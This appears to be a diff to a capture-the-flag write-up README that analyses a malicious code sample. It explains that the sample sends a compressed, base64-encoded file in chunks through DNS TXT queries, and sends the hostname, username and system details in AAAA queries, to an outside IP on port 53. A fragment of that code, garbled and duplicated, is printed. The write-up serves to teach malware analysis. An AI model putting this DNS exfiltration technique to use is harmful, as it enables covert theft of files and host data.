mine-x/ctf-writeups/2025-target-cyber-defense-challenge/8_shadow_commit/README.md

 f"{os.uname().sysname}.{os.uname().machine}.{os.uname().nodename}.{os.getlogin()}"_ = f"{os.uname().sysname}.{os.uname().machine}.{os.uname().nodename}.{os.getlogin()}"q(source, 0o34)
 ```

-We can see that this code is sending DNS queries over UDP to IP address `251.91.13.37` on port DNS (0o65 = octal 65 = decimal 53).
+We can see that this code is sending DNS queries over UDP to IP address `251.91.13.37` on port DNS.
 It reads and compresses a file, encodes it as base64, and splits it into chunks.
-Those chunks get embedded in DNS TXT queries (0o20 = octal 20 = decimal 16 = TXT record type; specific decimal numbers are assigned to represent different DNS record types, and 16 corresponds to TXT).
-System information gets sent in a DNS AAAA query (0o34 = octal 34 = decimal 28 = AAAA record type).
+Those chunks get embedded in DNS TXT queries.
+System information gets sent in a DNS AAAA query.

 **Flag:** ```251.91.13.37```

+## Appendix

+Octal number conversions:

+- 0o65 = octal 65 = decimal 53 - port 53 is a common port for DNS
+Note that specific decimal numbers are assigned to represent different DNS record types.
+- 0o20 = octal 20 = decimal 16 = TXT record type
+- 0o34 = octal 34 = decimal 28 = AAAA record type